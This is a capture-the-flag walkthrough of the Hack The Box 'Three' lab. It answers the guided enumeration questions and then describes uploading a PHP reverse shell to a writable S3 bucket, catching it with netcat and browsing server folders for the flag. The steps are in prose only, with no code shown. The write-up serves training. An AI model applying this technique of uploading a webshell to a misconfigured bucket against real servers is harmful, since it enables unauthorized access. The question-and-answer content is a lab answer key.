Three writeup

How many TCP ports are open?

Answer : 2

What is the domain of the email address provided in the "Contact" section of the website?

Answer : thetoppers.htb

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

Answer : /etc/hosts

Which sub-domain is discovered during further enumeration?

Cool thing about gobuster, it can enumerate subdomains too !

Answer : s3.thetoppers.htb

Which service is running on the discovered sub-domain?

Answer : Amazon S3

Which command line utility can be used to interact with the service running on the discovered sub-domain?

Answer : awscli

Which command is used to set up the AWS CLI installation?

Answer : aws configure

What is the command used by the above utility to list all of the S3 buckets?

Answer : aws s3 ls

This server is configured to run files written in what web scripting language?

Answer : PHP

Submit root flag

So we can enumerate files on the s3, but can we upload too ? We know the server is running php files so let's create a php reverse shell, you can use this great website : Revshells (I encourage you to create it yourself and not put this kind of information on a website but it's for swiftness purposes) put the IP address you want the webserver to call (the IP address corresponding to your openvpn tunnel), choose a port and take one of the php reverse shells :

Put it in a php file and upload it on the S3 :

Now let's use netcat to listen on the corresponding port :

And access the uploaded php reverse shell file :

We have our reverse shell !

Now you should check some usual interesting Linux folders (a non-exhaustive list : /home, /etc, /var/log, /tmp, /proc, /root, /usr/local and more !) a well-known one is the /var/www which is commonly used to store files for web servers :

Answer : Get your own !